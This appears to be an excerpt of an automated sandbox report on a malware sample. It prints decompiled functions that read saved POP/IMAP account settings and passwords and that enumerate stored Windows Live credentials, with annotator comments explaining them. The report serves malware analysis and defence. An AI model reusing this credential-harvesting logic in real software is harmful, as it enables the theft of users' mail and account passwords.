                                                                                                                                                                        0x00408a50
                                                                                                                                                                        0x00408a56
                                                                                                                                                                        0x00408a5a
                                                                                                                                                                        0x00408a64
                                                                                                                                                                        0x00408a6c
                                                                                                                                                                        0x00408a6f
                                                                                                                                                                        0x00408a75
                                                                                                                                                                        0x00408a7b
                                                                                                                                                                        0x00408a81
                                                                                                                                                                        0x00408a94

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004088FD
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00408919
                                                                                                                                                                        • memcpy.MSVCRT ref: 00408941
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040895E
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004089E7
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004089F1
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00408A29
                                                                                                                                                                          • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                          • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                          • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
                                                                                                                                                                          • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
• String ID: d$xA
• API String ID: 3781940870-3129348561
• Opcode ID: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
• Instruction ID: 74bd4705b90376de5a47ec474c9ee228b959cea471a61b54eb6c1cdd4b9bc2c0
• Opcode Fuzzy Hash: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
• Instruction Fuzzy Hash: 62515C71A01704AFD724DF39C58179ABBE4EF48354F10852EE59ADB381DB74A941CF44
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%
E00403127(void* __eax, intOrPtr _a4, char* _a8) {
	signed int _v8;
	intOrPtr _v12;
	char _v188;
	char _v268;
	char _v524;
	void* __ebx;
	void* __edi;
	char* _t53;
	void* _t60;
	void* _t65;
	char* _t70;

	_v8 = _v8 & 0x00000000;
	_t65 = __eax;
	*((intOrPtr*)(__eax + 0x8c)) = 3;
	*((intOrPtr*)(__eax + 0x210)) = 1;
	E004030F9(_a4, "UsesIMAP", &_v524, 0xff, _a8);
	if(_v524 == 0x31) {
		*((intOrPtr*)(_t65 + 0x210)) = 2;
	}
	_v12 = _t65 + 0x110;
	E004030F9(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
	_t70 = _t65 + 0x214;
	E004030F9(_a4, "LoginName", _t70, 0x7f, _a8);
	E004030F9(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
	E004030F9(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
	E004030F9(_a4, "SavePasswordText", &_v268, 0xff, _a8);
	if(_v268 != 0) {
		_v188 = 0;
		E00401D19(&_v268, _t65 + 0x294);
		if(*_t70 == 0) {
			_push(_a8);
			_t60 = 0x7f;
			_push(_t60);
			_push(_t70);
			_push("PopAccount");
			_push(_a4);
			E004030F9();
			if(*_t70 != 0) {
				_t53 = strchr(_t70, 0x40);
				_a8 = _t53;
				if(_t53 != 0) {
					E004060DA(_t60, _v12, &(_t53[1]));
					*_a8 = 0;
				}
			}
		}
		_v8 = 1;
	}
	if(*_t70 != 0) {
		_v8 = 1;
	}
	return _v8;
}
0x00403130
0x0040313a
0x00403151
0x0040315b
0x00403165
0x00403171
0x00403173
0x00403173
0x00403191
0x00403194
0x0040319c
0x004031ad
0x004031c3
0x004031dc
0x004031f4
0x00403200
0x0040320e
0x00403215
0x0040321d
0x0040321f
0x00403224
0x00403225
0x00403226
0x00403227
0x0040322c
0x0040322f
0x00403237
0x0040323c
0x00403245
0x00403248
0x0040324f
0x00403258
0x00403258
0x00403248
0x00403237
0x0040325b
0x0040325b
0x00403268
0x0040326a
0x0040326a
0x00403275

APIs
  • Part of subcall function 004030F9: GetPrivateProfileStringA.KERNEL32(00000000,?,0041344F,?,?,?), ref: 0040311D
  • strchr.MSVCRT ref: 0040323C
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
• API String ID: 1348940319-1729847305
• Opcode ID: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
• Instruction ID: 730259ebfdc93430ac8a7640b0a1394381beeb8186f258e339b1e1584fb818e0
• Opcode Fuzzy Hash: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
• Instruction Fuzzy Hash: FF31917150420ABEEF219F60CC06FD97F6CAF10359F10806AF558761D2CBB9AB949B54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 16%
E0040F70E(char* __eax, void* __ecx) {
	void* _t2;
	char* _t3;
	void* _t5;
	void* _t6;
	void* _t7;

	_t3 = __eax;
	_t6 = __ecx;
	_t5 = 4;
	while(1) {
		_t2 = *_t3;
		if(_t2 != 0x3c) {
			goto L3;
		}
		_push(_t5);
		_push("&lt;");
		L14:
		_t2 = memcpy(_t6, ??, ??);
		_t7 = _t7 + 0xc;
		_t6 = _t6 + _t5;
		L16:
		if(*_t3 != 0) {
			_t3 = _t3 + 1;
			continue;
		}
		return _t2;
		L3:
		if(_t2 != 0x3e) {
			if(_t2 != 0x22) {
				if(_t2 != 0xb0) {
					if(_t2 != 0x26) {
						if(_t2 != 0xa) {
							*_t6 = _t2;
							_t6 = _t6 + 1;
						} else {
							_push(_t5);
							_push("<br>");
							goto L14;
						}
					} else {
						_push(5);
						_push("&amp;");
						goto L11;
					}
				} else {
					_push(5);
					_push("&deg;");
					L11:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + 5;
				}
			} else {
				_t2 = memcpy(_t6, "&quot;", 6);
				_t7 = _t7 + 0xc;
				_t6 = _t6 + 6;
			}
		} else {
                                                                                                                                                                        						_push(_t5);
                                                                                                                                                                        						_push("&gt;");
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L16;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
• Opcode ID: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
• Instruction ID: b4a8218c7fa3979214449631b2efcde822773b41d0541f29ded2a506b887ed0e
• Opcode Fuzzy Hash: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
• Instruction Fuzzy Hash: FF01DFB2EC465025DA7100092C86FE70A494BFAB11FB50137F98533AC4E0AD0CCF829F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 69%
			// Editor's note (inference, not stated by the report): the field offsets read from each
			// enumerated record (+4 type == 1, +8 target name, +0x18 blob size, +0x1c blob, +0x30 user name)
			// match the Win32 CREDENTIAL structure, and the indirect calls through _v776 / _v788 with the
			// filter L"WindowsLive:name=*" behave like CredEnumerateW / CredFree. This is consistent with
			// the report's "Tries to steal Mail credentials (via file / registry access)" signature.
			E0040DEC3(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406282();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				// Only on OS versions where field +4 exceeds 5 is a target-name filter used.
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404651( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046CC( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					// Enumerate: (filter, flags, &count, &records)
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						// Release the enumerated records
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									// Likely a 17-byte prefix compare against "windowslive:name="; 0 means match.
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L004120D2();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											// Blob size is in bytes; >> 1 gives the wide-char count.
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
                                                                                                                                                                        										}
                                                                                                                                                                        										if(_v260 == 0) {
                                                                                                                                                                        											_t69 = _a4;
                                                                                                                                                                        											_t44 = _t69 + 8;
                                                                                                                                                                        											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
                                                                                                                                                                        											__eflags =  *_t44;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t93 = _a4;
                                                                                                                                                                        											 *((intOrPtr*)( *_t93 + 4))( &_v516);
                                                                                                                                                                        											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t58 = _v804 + 1;
                                                                                                                                                                        							_v804 = _t58;
                                                                                                                                                                        						} while (_t58 < _v812);
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}

APIs
  • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
  • memset.MSVCRT ref: 0040DF75
  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040DF8C
  • _strnicmp.MSVCRT ref: 0040DFA6
  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFD2
  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFF2
Strings
Memory Dump Source
  • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
  • API ID: ByteCharMultiWide$Version_strnicmpmemset
  • String ID: WindowsLive:name=*$windowslive:name=
  • API String ID: 945165440-3589380929
  • Opcode ID: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
  • Instruction ID: faca0abe0adb4f8b424a3cc142a11908341e250f8e36283e96c9ece6c5c035f0
  • Opcode Fuzzy Hash: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
  • Instruction Fuzzy Hash: 14419FB1508345AFC320DF15D8848ABBBECEB84344F00493EF999A2291D734ED48CB66
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
			E00408155(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E00412360(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L00412072();
					if(_t26 != 0) {
						E0040802D(_t35,  &_v4360);
					}
				}
				return 1;
			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040817B
                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00408186
                                                                                                                                                                        • GetWindowTextA.USER32 ref: 00408199
                                                                                                                                                                        • memset.MSVCRT ref: 004081BF
                                                                                                                                                                        • GetClassNameA.USER32(?,?,000000FF), ref: 004081D2
                                                                                                                                                                        • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 004081E4
                                                                                                                                                                          • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                                                                                                        • String ID: sysdatetimepick32
                                                                                                                                                                        • API String ID: 896699463-4169760276
                                                                                                                                                                        • Opcode ID: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                                                                                                                                                                        • Instruction ID: 8ec491919e3a594e32bcc0b3aeb202d37a515ee6f0006301200e52d8450d0196
                                                                                                                                                                        • Opcode Fuzzy Hash: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                                                                                                                                                                        • Instruction Fuzzy Hash: 2311EC7280511C7EE7119B54DD41EEB7BACEF19355F0400BBFA44E2152EA789FC48B68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E0040571F(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                        				void* _t98;
                                                                                                                                                                        				void* _t101;
                                                                                                                                                                        				short* _t118;
                                                                                                                                                                        				unsigned int _t126;
                                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                        				short _t153;
                                                                                                                                                                        				signed int _t155;
                                                                                                                                                                        
                                                                                                                                                                        				_t129 = __ecx;
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t74 = _a4 - 0x4e;
                                                                                                                                                                        				_t155 = __ecx;
                                                                                                                                                                        				if(_t74 == 0) {
                                                                                                                                                                        					_t146 = _a12;
                                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
                                                                                                                                                                        					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                        							E00404D4C(__eflags,  *_t146,  *(_t146 + 0xc));
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
                                                                                                                                                                        					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
                                                                                                                                                                        						L27:
                                                                                                                                                                        						_t75 = 0;
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        						goto L28;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                                                                                                                                        						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
                                                                                                                                                                        							goto L27;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t76 =  *(_t146 + 0x14);
                                                                                                                                                                        						__eflags = _t76 & 0x00000002;
                                                                                                                                                                        						if((_t76 & 0x00000002) == 0) {
                                                                                                                                                                        							L36:
                                                                                                                                                                        							_t131 =  *(_t146 + 0x18) ^ _t76;
                                                                                                                                                                        							__eflags = 0x0000f000 & _t131;
                                                                                                                                                                        							if((0x0000f000 & _t131) == 0) {
                                                                                                                                                                        								L39:
                                                                                                                                                                        								__eflags =  *(_t146 + 0x14) & 0x00000002;
                                                                                                                                                                        								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
                                                                                                                                                                        									goto L27;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                                                                                                        								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
                                                                                                                                                                        									goto L27;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags =  *(_t146 + 0xc);
                                                                                                                                                                        								E00401413(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
                                                                                                                                                                        								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
                                                                                                                                                                        								E00401413(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
                                                                                                                                                                        								 *((intOrPtr*)(_t155 + 0x14)) = 1;
                                                                                                                                                                        								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
                                                                                                                                                                        								 *((intOrPtr*)(_t155 + 0x14)) = 0;
                                                                                                                                                                        								_t75 = 1;
                                                                                                                                                                        								L28:
                                                                                                                                                                        								return _t75;
                                                                                                                                                                        							}
                                                                                                                                                                        							L37:
                                                                                                                                                                        							_t89 = E004048E6( *_t146,  *(_t146 + 0xc), 0xf002);
                                                                                                                                                                        							__eflags = _t89 & 0x00000002;
                                                                                                                                                                        							if((_t89 & 0x00000002) != 0) {
                                                                                                                                                                        								_t90 = _t89 & 0x0000f000;
                                                                                                                                                                        								__eflags = _t90 - 0x1000;
                                                                                                                                                                        								_v8 = _t90;
                                                                                                                                                                        								E00401413(_t155, 0x3ee, 0 | _t90 == 0x00001000);
                                                                                                                                                                        								_v16 - 0x2000 = _v16 == 0x2000;
                                                                                                                                                                        								E00401413(_t155, 0x3ef, 0 | _v16 == 0x00002000);
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L39;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                                                                                                        						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
                                                                                                                                                                        							goto L37;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L36;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t98 = _t74 - 0xc2;
                                                                                                                                                                        				if(_t98 == 0) {
                                                                                                                                                                        					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
                                                                                                                                                                        					E004055A9(_t155);
                                                                                                                                                                        					goto L27;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t101 = _t98 - 1;
                                                                                                                                                                        				if(_t101 != 0) {
                                                                                                                                                                        					goto L27;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t126 = _a8 >> 0x10;
                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
                                                                                                                                                                        					L7:
                                                                                                                                                                        					if(_t126 != 0) {
                                                                                                                                                                        						goto L27;
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_a8 != 0x3f0) {
                                                                                                                                                                        						L13:
                                                                                                                                                                        						if(_a8 == 0x3eb) {
                                                                                                                                                                        							E00404B3F(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_a8 == 0x3ec) {
                                                                                                                                                                        							E00404B82(GetDlgItem( *(_t155 + 4), 0x3e9));
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_a8 == 0x3ee) {
                                                                                                                                                                        							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_a8 == 0x3ef) {
                                                                                                                                                                        							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_a8 == 2) {
                                                                                                                                                                        							EndDialog( *(_t155 + 4), 2);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_a8 == 1) {
                                                                                                                                                                        							E00405542(_t155);
                                                                                                                                                                        							EndDialog( *(_t155 + 4), 1);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t75 = 1;
                                                                                                                                                                        						goto L28;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
                                                                                                                                                                        					_t129 = 0;
                                                                                                                                                                        					if(_t128 <= 0) {
                                                                                                                                                                        						L12:
                                                                                                                                                                        						E004055A9(_t155);
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t144 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
                                                                                                                                                                        						 *(_t118 + 2) = _t129;
                                                                                                                                                                        						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
                                                                                                                                                                        						_t129 = _t129 + 1;
                                                                                                                                                                        						_t144 = _t144 + 0x14;
                                                                                                                                                                        						 *_t118 = _t153;
                                                                                                                                                                        					} while (_t129 < _t128);
                                                                                                                                                                        					goto L12;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if(_a8 != 0x3ed) {
                                                                                                                                                                        						goto L27;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						E004054D0(__ecx, __ecx);
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}
(Instruction address column for the decompiled function above, one entry per decompiled line; its alignment to the code was lost in extraction. Entries run from 0x0040571f to 0x00405963, with 0x00000000 for lines that carry no address.)

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004057C7
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004057DA
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004057EF
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405807
                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00405823
                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00405836
                                                                                                                                                                          • Part of subcall function 004054D0: GetDlgItem.USER32 ref: 004054DE
                                                                                                                                                                          • Part of subcall function 004054D0: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054F3
                                                                                                                                                                          • Part of subcall function 004054D0: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 0040550F
                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040584E
                                                                                                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 0040595A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$DialogMessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2485852401-0
                                                                                                                                                                        • Opcode ID: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                                                                                                                                                                        • Instruction ID: 327bdf07108b1d48d13abdf232bd1ccce71b7be96730af3de4981d1ea2c32abc
                                                                                                                                                                        • Opcode Fuzzy Hash: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6561C031600A05AFDB25BF25C886A2BB3A5FF40725F00C23EF915A72D1D778A960CF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 85%
			/* Decompiler output as recorded by the report (quality 85%). Per the API ID of this
			   function (??2@ / ??3@ / memset / SetFocus / InvalidateRect), the thunks L00412090
			   and L00412096 are the C++ runtime's operator new and operator delete. */
			E0040596A(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;          /* declared RECT* by the decompiler, but only ever used as a 0/1 flag (see below) */
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);        /* _t58 is never declared: a decompiler artifact, not a real operand */
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L00412090();        /* operator new(0xc): 12-byte object stored at __edi+0xc */
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;   /* note: a failed allocation leaves _t82 == 0 and is dereferenced below */
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L00412096();    /* operator delete on a previous element array */
					 *_t82 = 0;
				}
				/* object layout: [0] element array, [1] element count, [2] HWND */
				_t82[2] = _a8;
				_t41 = E00404A05(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				/* count*4 with the OR-ed mask the decompiler produced for the compiler's multiply
				   overflow guard (likely seto/neg/or): on overflow the size becomes 0xFFFFFFFF so
				   operator new fails instead of returning an undersized buffer */
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L00412090();        /* operator new(count*4) */
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E004085AB( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					/* no table supplied in __eax: build a temporary one of 0x14-byte records */
					_t86 = ( *(_t80 + 0xc))[1];
